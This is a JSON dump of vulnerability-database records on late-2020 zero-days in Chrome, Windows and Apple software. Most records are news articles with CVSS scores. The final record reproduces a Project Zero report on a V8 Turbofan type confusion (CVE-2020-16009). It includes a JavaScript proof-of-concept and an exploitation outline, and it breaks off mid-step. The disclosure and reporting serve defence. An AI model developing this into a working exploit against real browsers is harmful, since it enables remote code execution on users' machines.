"[![chrome-extensions](https://thehackernews.com/images/-wwpOKprFWzg/X6EjqTcCLXI/AAAAAAAAA9I/mBsBYTybLoExMJP9mvW6fPJ2Njf3EeA6gCLcBGAsYHQ/s728-e1000/chrome-extensions.jpg)](<https://thehackernews.com/images/-wwpOKprFWzg/X6EjqTcCLXI/AAAAAAAAA9I/mBsBYTybLoExMJP9mvW6fPJ2Njf3EeA6gCLcBGAsYHQ/s0/chrome-extensions.jpg>)\n\nGoogle has patched a second actively exploited zero-day flaw in the Chrome browser in two weeks, along with addressing nine other security vulnerabilities in its latest update.\n\nThe company [released](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) 86.0.4240.183 for Windows, Mac, and Linux, which it said will be rolling out over the coming days/weeks to all users.\n\nThe zero-day flaw, tracked as **CVE-2020-16009**, was reported by Clement Lecigne of Google's Threat Analysis Group (TAG) and Samuel Gro\u00df of Google Project Zero on October 29.\n\nThe company also warned that it \"is aware of reports that an exploit for CVE-2020-16009 exists in the wild.\"\n\nGoogle hasn't made any details about the bug or the exploit used by threat actors public so as to allow a majority of users to install the updates and prevent other adversaries from developing their own exploits leveraging the flaw.\n\nBut Ben Hawkes, Google Project Zero's technical lead, [said](<https://twitter.com/benhawkes/status/1323374326150701057>) CVE-2020-16009 concerned an \"inappropriate implementation\" of its V8 JavaScript rendering engine leading to remote code execution.\n\nAside from the ten security fixes for the desktop version of Chrome, Google has also addressed a separate zero-day in Chrome for Android that was being exploited in the wild \u2014 a sandbox escape flaw tracked as CVE-2020-16010.\n\nThe zero-day disclosures come two weeks after Google fixed a critical buffer overflow flaw ([CVE-2020-15999](<https://thehackernews.com/2020/10/chrome-zeroday-attacks.html>)) in the Freetype font library.\n\nThen late last week, the company revealed a Windows privilege escalation zero-day ([CVE-2020-17087](<https://thehackernews.com/2020/11/warning-google-discloses-windows-zero.html>)) that was employed in combination with the above font rendering library flaw to crash Windows systems.\n\nThe search giant hasn't so far clarified if the same threat actor was exploiting the two zero-days.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T09:33:00", "type": "thn", "title": "New Chrome Zero-Day Under Active Attacks \u2013 Update Your Browser", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-17087"], "modified": "2020-11-03T11:15:49", "id": "THN:955CBC4C8C3F414A1ED3D5F7CAA08A9F", "href": "https://thehackernews.com/2020/11/new-chrome-zero-day-under-active.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:48", "description": "[![chrome zero day vulnerability](https://thehackernews.com/images/-xZzCUwzBVrc/X5BgBpam4II/AAAAAAAA3Yw/vJtLuVzSt8AFXoZyGKSmcxHJtXC6fxv1QCLcBGAsYHQ/s728-e1000/chrome-zero-day-vulnerability.jpg)](<https://thehackernews.com/images/-xZzCUwzBVrc/X5BgBpam4II/AAAAAAAA3Yw/vJtLuVzSt8AFXoZyGKSmcxHJtXC6fxv1QCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\nAttention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today.\n\nGoogle [released](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) Chrome version 86.0.4240.111 today to patch several security high-severity issues, including a zero-day vulnerability that has been exploited in the wild by attackers to hijack targeted computers.\n\nTracked as **CVE-2020-15999**, the actively exploited vulnerability is a type of memory-corruption flaw called heap buffer overflow in Freetype, a popular open source software development library for rendering fonts that comes packaged with Chrome.\n\nThe vulnerability was discovered and reported by security researcher Sergei Glazunov of Google Project Zero on October 19 and is subject to a seven-day public disclosure deadline due to the flaw being under active exploitation.\n\nGlazunov also immediately reported the zero-day vulnerability to FreeType developers, who then developed an emergency patch to address the issue on October 20 with the release of FreeType 2.10.4.\n\nWithout revealing technical details of the vulnerability, the technical lead for Google's Project Zero Ben Hawkes [warned](<https://twitter.com/benhawkes/status/1318640422571266048>) on Twitter that while the team has only spotted an exploit targeting Chrome users, it's possible that other projects that use FreeType might also be vulnerable and are advised to deploy the fix included in FreeType version 2.10.4.\n\n[![chrome zero day vulnerability](https://thehackernews.com/images/-DBudKmv052Y/X5BhH0P-IwI/AAAAAAAA3Y4/rJEum-YfowkzJ2rHLv4cE-On28Q1G02FwCLcBGAsYHQ/s728-e1000/chrome-zero-day-vulnerability.jpg)](<https://thehackernews.com/images/-DBudKmv052Y/X5BhH0P-IwI/AAAAAAAA3Y4/rJEum-YfowkzJ2rHLv4cE-On28Q1G02FwCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\n\"While we only saw an exploit for Chrome, other users of freetype should adopt the fix discussed here: https://savannah.nongnu.org/bugs/?59308 -- the fix is also in today's stable release of FreeType 2.10.4,\" Hawkes writes.\n\nAccording to [details](<https://savannah.nongnu.org/bugs/?59308>) shared by Glazunov, the vulnerability exists in the FreeType's function \"Load_SBit_Png,\" which processes PNG images embedded into fonts. It can be exploited by attackers to execute arbitrary code just by using specifically crafted fonts with embedded PNG images.\n\n\"The issue is that libpng uses the original 32-bit values, which are saved in `png_struct`. Therefore, if the original width and/or height are greater than 65535, the allocated buffer won't be able to fit the bitmap,\" Glazunov explained.\n\nGlazunov also published a font file with a proof-of-concept exploit.\n\nGoogle released Chrome 86.0.4240.111 as Chrome's \"stable\" version, which is available to all users, not just to opted-in early adopters, [saying](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) that the company is aware of reports that \"an exploit for CVE-2020-15999 exists in the wild,\" but did not reveal further details of the active attacks.\n\nBesides the FreeType zero-day vulnerability, Google also patched four other flaws in the latest Chrome update, three of which are high-risk vulnerabilities\u2014an inappropriate implementation bug in Blink, a use after free bug in Chrome's media, and use after free bug in PDFium\u2014and one medium-risk use after free issue in browser's printing function.\n\nAlthough the Chrome web browser automatically notifies users about the latest available version, users are recommended to manually trigger the update process by going to \"Help \u2192 About Google Chrome\" from the menu.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-21T16:26:00", "type": "thn", "title": "New Chrome 0-day Under Active Attacks \u2013 Update Your Browser Now", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-21T16:27:58", "id": "THN:1CAE17F613AA7CBF6F4E99804811C608", "href": "https://thehackernews.com/2020/10/chrome-zeroday-attacks.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-09T12:38:46", "description": "[![Apple iOS Security Update](https://thehackernews.com/images/-4s737H_lQjY/X6T-7usqm2I/AAAAAAAAA-s/xbIl-rUzZWo6sfq6-YyjjyEeHi5vz2GugCLcBGAsYHQ/s728-e1000/apple-update.jpg)](<https://thehackernews.com/images/-4s737H_lQjY/X6T-7usqm2I/AAAAAAAAA-s/xbIl-rUzZWo6sfq6-YyjjyEeHi5vz2GugCLcBGAsYHQ/s0/apple-update.jpg>)\n\nApple on Thursday released multiple security updates to patch three zero-day vulnerabilities that were revealed as being actively exploited in the wild.\n\nRolled out as part of its iOS, iPadOS, macOS, and watchOS updates, the flaws reside in the FontParser component and the kernel, allowing adversaries to remotely execute arbitrary code and run malicious programs with kernel-level privileges.\n\nThe zero-days were discovered and reported to Apple by Google's Project Zero security team.\n\n\"Apple is aware of reports that an exploit for this issue exists in the wild,\" the iPhone maker said of the three zero-days without giving any additional details so as to allow a vast majority of users to install the updates.\n\nThe list of [impacted devices](<https://support.apple.com/en-us/HT201222>) includes iPhone 5s and later, iPod touch 6th and 7th generation, iPad Air, iPad mini 2 and later, and Apple Watch Series 1 and later.\n\nThe fixes are available in versions iOS 12.4.9 and 14.2, iPadOS 14.2, watchOS 5.3.9, 6.2.9, and 7.1, and as a supplemental update for macOS Catalina 10.15.7.\n\nAccording to Apple's [security bulletin](<https://support.apple.com/en-us/HT211929>), the flaws are:\n\n * **CVE-2020-27930:** A memory corruption issue in the FontParser library that allows for remote code execution when processing a maliciously crafted font.\n * ****CVE-2020-27950**:** A memory initialization issue that allows a malicious application to execute arbitrary code with kernel privileges.\n * **CVE-2020-27932:** A type-confusion issue that makes it possible for a malicious application to disclose kernel memory.\n\n\"Targeted exploitation in the wild similar to the other recently reported 0days,\" [said](<https://twitter.com/ShaneHuntley/status/1324431104187670529>) Shane Huntley, Director of Google's Threat Analysis Group. \"Not related to any election targeting.\"\n\nThe disclosure is the latest in the string of zero-days Project Zero has reported since October 20. First came the Chrome zero-day in Freetype font rendering library ([CVE-2020-15999](<https://thehackernews.com/2020/10/chrome-zeroday-attacks.html>)), then a Windows zero-day ([CVE-2020-17087](<https://thehackernews.com/2020/11/warning-google-discloses-windows-zero.html>)), followed by two more in Chrome and its Android variant ([CVE-2020-16009 and CVE-2020-16010](<https://thehackernews.com/2020/11/new-chrome-zero-day-under-active.html>)).\n\nA patch for the Windows zero-day is expected to be released on November 10 as part of this month's Patch Tuesday.\n\nWhile more details are awaited on whether the zero-days were abused by the same threat actor, it's recommended that users update their devices to the latest versions to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-06T07:48:00", "type": "thn", "title": "Update Your iOS Devices Now \u2014 3 Actively Exploited 0-Days Discovered", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-17087", "CVE-2020-27930", "CVE-2020-27932", "CVE-2020-27950"], "modified": "2020-12-02T06:39:58", "id": "THN:DAE548E4C591A2718BC3A3D2C9440FB1", "href": "https://thehackernews.com/2020/11/update-your-ios-devices-now-3-actively.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:47", "description": "[![Windows Zero-Day](https://thehackernews.com/images/--Cevx7TUFx0/X5_TgyD_ymI/AAAAAAAAA8o/uOE36OUB0LwmCFccKnw8bO02pKnkeZ_XQCLcBGAsYHQ/s728-e1000/google.jpg)](<https://thehackernews.com/images/--Cevx7TUFx0/X5_TgyD_ymI/AAAAAAAAA8o/uOE36OUB0LwmCFccKnw8bO02pKnkeZ_XQCLcBGAsYHQ/s728/google.jpg>)\n\nGoogle has disclosed details of a new zero-day privilege escalation flaw in the Windows operating system that's being actively exploited in the wild.\n\nThe elevation of privileges (EoP) vulnerability, tracked as [CVE-2020-17087](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2104>), concerns a buffer overflow present since at least Windows 7 in the Windows Kernel Cryptography Driver (\"cng.sys\") that can be exploited for a sandbox escape.\n\n\"The bug resides in the cng!CfgAdtpFormatPropertyBlock function and is caused by a 16-bit integer truncation issue,\" Google's Project Zero researchers Mateusz Jurczyk and Sergei Glazunov noted in their technical write-up.\n\nThe security team made the details public following a seven-day disclosure deadline because of evidence that it's under active exploit.\n\nProject Zero has shared a proof-of-concept exploit (PoC) that can be used to corrupt kernel data and crash vulnerable Windows devices even under default system configurations.\n\nWhat's notable is that the exploit chain requires linking CVE-2020-17087 with another Chrome browser zero-day ([CVE-2020-15999](<https://thehackernews.com/2020/10/chrome-zeroday-attacks.html>)) that was fixed by Google last week.\n\nThe Chrome zero-day involves a heap buffer overflow in the Freetype font library to run malicious code in the browser, but the newly revealed Windows zero-day makes it possible for an attacker to break out of Chrome's sandbox protections and run the code on Windows \u2014 also called a sandbox escape.\n\nStating that the exploitation is \"not related to any US election-related targeting,\" Project Zero's Ben Hawkes said a patch for the flaw is expected to be released by Microsoft on November 10.\n\nHawkes also [defended](<https://twitter.com/benhawkes/status/1322211779028557824>) the practice of disclosing zero-days within a week of them being actively exploited.\n\n\"We think there's defensive utility to sharing these details, and that opportunistic attacks using these details between now and the patch being released is reasonably unlikely (so far it's been used as part of an exploit chain, and the entry-point attack is fixed),\" he said.\n\n\"The short deadline for in-the-wild exploit also tries to incentivize out-of-band patches or other mitigations being developed/shared with urgency. Those improvements you might expect to see over a longer term period,\" Hawkes added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T09:43:00", "type": "thn", "title": "WARNING: Google Discloses Windows Zero-Day Bug Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-17087"], "modified": "2020-11-02T09:43:23", "id": "THN:7AD5261E90CC5E52D9933B8F13139A3E", "href": "https://thehackernews.com/2020/11/warning-google-discloses-windows-zero.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:45", "description": "[![chrome zero-day vulnerability](https://thehackernews.com/images/-2IzcUtlUHmU/X6ytoFIP5BI/AAAAAAAABAU/l83-n2BWx48p3Q_Ixo6RYxR3ctgM409-gCLcBGAsYHQ/s728-e1000/chrome-zero-day-vulnerability.jpg)](<https://thehackernews.com/images/-2IzcUtlUHmU/X6ytoFIP5BI/AAAAAAAABAU/l83-n2BWx48p3Q_Ixo6RYxR3ctgM409-gCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\nGoogle has patched two more zero-day flaws in the Chrome web browser for desktop, making it the fourth and fifth actively exploited vulnerabilities addressed by the search giant in recent weeks.\n\nThe company released [86.0.4240.198](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html>) for Windows, Mac, and Linux, which it said will be rolling out over the coming days/weeks to all users.\n\nTracked as CVE-2020-16013 and CVE-2020-16017, the flaws were discovered and reported to Google by \"anonymous\" sources, unlike previous cases, which were uncovered by the company's Project Zero elite security team.\n\nGoogle acknowledged that exploits for both the vulnerabilities exist in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes.\n\nAccording to the release notes, the two flaws are:\n\n * **CVE-2020-16013:** An \"inappropriate implementation\" of its V8 JavaScript rendering engine was reported on November 9.\n * **CVE-2020-16017:** An [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) memory corruption issue in Chrome's [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>) feature was reported on November 7.\n\nIt's worth noting that the zero-day it patched last week, [CVE-2020-16009](<https://thehackernews.com/2020/11/new-chrome-zero-day-under-active.html>), also concerned an inappropriate implementation of V8, leading to remote code execution. It's not immediately clear if the two flaws are related.\n\nOver the last week, Google disclosed a number of actively exploited zero-day flaws targeting [Chrome](<https://thehackernews.com/2020/10/chrome-zeroday-attacks.html>), [Windows](<https://thehackernews.com/2020/11/warning-google-discloses-windows-zero.html>), and Apple's [iOS and macOS](<https://thehackernews.com/2020/11/update-your-ios-devices-now-3-actively.html>), and while it appears that some of these issues were strung together to form an exploit chain, the company is yet to reveal key details about who may have been using them and who were the intended targets.\n\nIt's advised that users update their devices to the latest Chrome version to mitigate the risk associated with the two flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-11-12T03:36:00", "type": "thn", "title": "Two New Chrome 0-Days Under Active Attacks \u2013 Update Your Browser", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009", "CVE-2020-16013", "CVE-2020-16017"], "modified": "2020-11-12T03:36:28", "id": "THN:B62D46980D8C942D94FCDBF0A5899352", "href": "https://thehackernews.com/2020/11/two-new-chrome-0-days-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:46", "description": "[![patch tuesday](https://thehackernews.com/images/-SSbDtuq5p6I/X6u3kb-4j9I/AAAAAAAAA_k/O2lxJLtO0ckb7kXyo7sAerMCMc2AMCCBwCLcBGAsYHQ/s728-e1000/microsoft-windows-patch-update.jpg)](<https://thehackernews.com/images/-SSbDtuq5p6I/X6u3kb-4j9I/AAAAAAAAA_k/O2lxJLtO0ckb7kXyo7sAerMCMc2AMCCBwCLcBGAsYHQ/s0/microsoft-windows-patch-update.jpg>)\n\nMicrosoft formally released fixes for 112 newly discovered security vulnerabilities as part of its [November 2020 Patch Tuesday](<https://msrc.microsoft.com/update-guide/en-us/releaseNote/2020-Nov>), including an actively exploited zero-day flaw disclosed by Google's security team last week.\n\nThe rollout addresses flaws, 17 of which are rated as Critical, 93 are rated as Important, and two are rated Low in severity, once again bringing the patch count over 110 after a drop last month.\n\nThe security updates encompass a range of software, including Microsoft Windows, Office and Office Services and Web Apps, Internet Explorer, Edge, ChakraCore, Exchange Server, Microsoft Dynamics, Windows Codecs Library, Azure Sphere, Windows Defender, Microsoft Teams, and Visual Studio.\n\nChief among those fixed is [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) (CVSS score 7.8), a buffer overflow flaw in Windows Kernel Cryptography Driver (\"cng.sys\") that was [disclosed on October 30](<https://thehackernews.com/2020/11/warning-google-discloses-windows-zero.html>) by the Google Project Zero team as being used in conjunction with a Chrome zero-day to compromise Windows 7 and Windows 10 users.\n\nFor its part, Google released an update for its Chrome browser to address the zero-day (CVE-2020-15999) last month.\n\nMicrosoft's advisory about the flaw doesn't go into any details beyond the fact that it was a \"Windows Kernel Local Elevation of Privilege Vulnerability\" in part to [restructure security advisories](<https://msrc-blog.microsoft.com/2020/11/09/vulnerability-descriptions-in-the-new-version-of-the-security-update-guide/>) in line with the Common Vulnerability Scoring System (CVSS) format starting this month.\n\nOutside of the zero-day, the update fixes a number of remote code execution (RCE) vulnerabilities impacting Exchange Server ([CVE-2020-17084](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17084>)), Network File System ([CVE-2020-17051](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17051>)), and Microsoft Teams ([CVE-2020-17091](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17091>)), as well as a security bypass flaw in Windows Hyper-V virtualization software ([CVE-2020-17040](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17040>)).\n\nCVE-2020-17051 is rated 9.8 out of a maximum 10 on the CVSS score, making it a critical vulnerability. Microsoft, however, noted that the attack complexity of the flaw \u2014 the conditions beyond the attacker's control that must exist in order to exploit the vulnerability \u2014 is low.\n\nAs with the zero-day, the advisories associated with these security shortcomings are light on descriptions, with little to no information on how these RCE flaws are abused or which security feature in Hyper-V is being bypassed.\n\nOther critical flaws fixed by Microsoft this month include memory corruption vulnerabilities in Microsoft Scripting Engine (CVE-2020-17052) and Internet Explorer (CVE-2020-17053), and multiple RCE flaws in HEVC Video Extensions Codecs library.\n\nIt's highly recommended that Windows users and system administrators apply the latest security patches to resolve the threats associated with these issues.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-11T10:09:00", "type": "thn", "title": "Microsoft Releases Windows Security Updates For Critical Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-17040", "CVE-2020-17051", "CVE-2020-17052", "CVE-2020-17053", "CVE-2020-17084", "CVE-2020-17087", "CVE-2020-17091"], "modified": "2020-11-11T10:29:27", "id": "THN:89153A67BADBEDB4D309DCACBFF2EA7F", "href": "https://thehackernews.com/2020/11/microsoft-releases-windows-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-03T01:59:01", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-09T00:00:00", "type": "zdt", "title": "Chrome V8 Turbofan Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-09T00:00:00", "id": "1337DAY-ID-35211", "href": "https://0day.today/exploit/description/35211", "sourceData": "V8: Turbofan fails to deoptimize code after map deprecation, leading to type confusion\n\nNOTE: We have evidence that the following bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline.\n\nVULNERABILITY DETAILS\n\nWhen turbofan compiles code that performs a Map transition, it usually installs a CodeDependency so that the resulting code is deoptimized should the target Map ever be deprecated (meaning that the code should now transition to a different Map). This is done through the TransitionDependencyOffTheRecord function [1]. This function will only install the dependency if the target Map can be deprecated, which is determined by Map::CanBeDeprecated [2], shown next\n\n bool Map::CanBeDeprecated() const {\n for (InternalIndex i : IterateOwnDescriptors()) {\n PropertyDetails details = instance_descriptors(kRelaxedLoad).GetDetails(i);\n if (details.representation().IsNone()) return true;\n if (details.representation().IsSmi()) return true;\n if (details.representation().IsDouble() && FLAG_unbox_double_fields) <---\n return true;\n if (details.representation().IsHeapObject()) return true;\n if (details.kind() == kData && details.location() == kDescriptor) {\n return true;\n }\n }\n return false;\n }\n\nAs can be seen, this function assumes that a Map storing only fields of type Double or Tagged can not be deprecated if FLAG_unbox_double_fields is false, which is the case if pointer compression is enabled (the default on x64). This appears to be incorrect, as the following code demonstrated:\n\n // Requires --nomodify-field-representation-inplace\n\n function poc() {\n function hax(o) {\n o.a = 13.37;\n }\n\n let o1 = {};\n for (let i = 0; i < 100000; i++) {\n let o = i == 1000 ? {} : o1;\n hax(o);\n }\n\n let o2 = {};\n o2.a = {};\n // Map1 is now deprecated\n // %HaveSameMap(o2, o1) === false\n\n let o3 = {};\n hax(o3);\n // o3 was now transitioned to a deprecated map\n %DebugPrint(o3);\n // ...\n // - deprecated_map\n }\n %NeverOptimizeFunction(poc);\n poc();\n\nThis code ends up performing a new transition to a deprecated map.\n\nThis bug can be exploited when combined with the in-place field generalization mechanism. In short, the idea is to\n\n1. JIT compile a function that performs a transition from map1{a:double} to map2{a:double,b:whatever}\n2. Deprecate map2. This does not deoptimize the JIT code since map2 was thought to not be deprecatable\n3. In-place generalize map1.a to type tagged. This will not 